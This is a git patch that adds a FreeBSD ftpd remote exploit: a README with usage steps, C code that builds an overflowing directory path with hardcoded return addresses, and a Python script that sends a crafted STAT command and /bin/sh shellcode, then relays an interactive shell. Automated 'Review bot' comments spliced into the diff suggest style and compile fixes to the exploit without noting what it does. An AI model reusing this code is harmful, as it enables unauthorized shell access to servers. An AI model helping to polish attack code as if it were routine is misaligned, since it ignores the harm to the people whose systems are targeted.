From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial
---
 exploits/ftpd_exp/README | 5 +++++
 exploits/ftpd_exp/exp.c | 25 +++++++++++++++++++++++++
 exploits/ftpd_exp/exp.py | 26 ++++++++++++++++++++++++++
 3 files changed, 56 insertions(+)
 create mode 100644 exploits/ftpd_exp/README
 create mode 100644 exploits/ftpd_exp/exp.c
 create mode 100644 exploits/ftpd_exp/exp.py
(limited to 'exploits/ftpd_exp')
diff --git a/exploits/ftpd_exp/README b/exploits/ftpd_exp/README
new file mode 100644
index 0000000..6a42370
--- /dev/null
+++ b/exploits/ftpd_exp/README
@@ -0,0 +1,5 @@
+Preliminary FreeBSD ftpd exploit by smiler / teso. Plz dont distribute outside
+teso. I'm sure there are better ways to do this...
+
+compile and run 'exp.c' on your homedir, and then run 'python exp.py' having
+altered it for your username and password. Offsets may need tweaking...
diff --git a/exploits/ftpd_exp/exp.c b/exploits/ftpd_exp/exp.c
new file mode 100644
index 0000000..5f80d44
--- /dev/null
+++ b/exploits/ftpd_exp/exp.c
@@ -0,0 +1,25 @@
+#include
+#include
+
+int
+main (int argc, char **argv)
+{
+ char buf[512];
+
+ memset (buf, 'a', 255);
+ buf[255] = '\0';
+ if (mkdir (buf, 0700) < 0) {
+ perror ("mkdir");
+ return (-1);
+ }
+ chdir (buf);
+ mkdir (buf, 0700);
+ chdir (buf);
+ mkdir (buf, 0700);
+ chdir (buf);
+ *(unsigned int *)(buf + 156) = 0xbfbffa2d;
+ *(unsigned int *)(buf + 160) = 0xbfbff361;
+ *(unsigned int *)(buf + 164) = 0xbfbff361;
+ mkdir (buf, 0700);
+
+}
diff --git a/exploits/ftpd_exp/exp.py b/exploits/ftpd_exp/exp.py
new file mode 100644
index 0000000..86ec3cc
--- /dev/null
+++ b/exploits/ftpd_exp/exp.py
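Review bot: The two `#include` lines at the top of the exp.c hunk name no header at all, so the file as committed cannot compile; the angle-bracket targets were most likely stripped when the patch was rendered, and the committed file should be checked against the author's copy before anything else is reviewed. `main` is declared `int` and returns `-1` when the first `mkdir` fails, but the normal path falls off the closing brace without a value; adding `return (0);` before the final `}` keeps both exits explicit and matches the style already used in the failure branch. The indentation of the body also appears collapsed to a single space in this rendering, so the file's real layout cannot be confirmed from the hunk as shown.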
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+from ftplib import *
+import os,time,struct,sys
+from select import select
+
+shellcode = '\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xc0\x50\x50\x50\xb0\x7f\xcd\x80\xeb\x17\x31\xc0\x5b\x50\x88\x43\x07\x8d\x4b\x08\x89\x5b\x08\x89\x43\x0c\x51\x53\x50\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh\x0a'
+
+ftp = FTP()
+ftp.connect('192.168.1.2',21)
+ftp.login('username','password')
+
+time.sleep(6)
+print 'sending stat command'
+ftp.putcmd('STAT a*/*/*/*/')
+print 'sending shellcode'
+ftp.sock.send(shellcode)
+time.sleep(2)
+while 1:
+ heh = select([sys.stdin,ftp.sock],[],[])
+ for i in heh[0]:
+ if i == sys.stdin:
+ buf = sys.stdin.readline()
+ ftp.sock.send(buf)
+ if i == ftp.sock:
+ buf = ftp.sock.recv(1024)
+ sys.stdout.write(buf)
--
cgit v1.3
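Review bot: `print 'sending stat command'` and the later `print` are Python 2 statement syntax, so the script cannot run under Python 3 even though the `#!/usr/bin/env python` shebang does not pin a major version; `#!/usr/bin/env python2` would state the real requirement. `from ftplib import *` is a star import from which only `FTP` is used, and `os` and `struct` are imported but never referenced; `from ftplib import FTP` plus dropping the unused names makes the dependencies explicit. Indentation inside the `while 1:` loop appears collapsed to a single space in this rendering, so the block structure of the loop body cannot be verified from the hunk as shown.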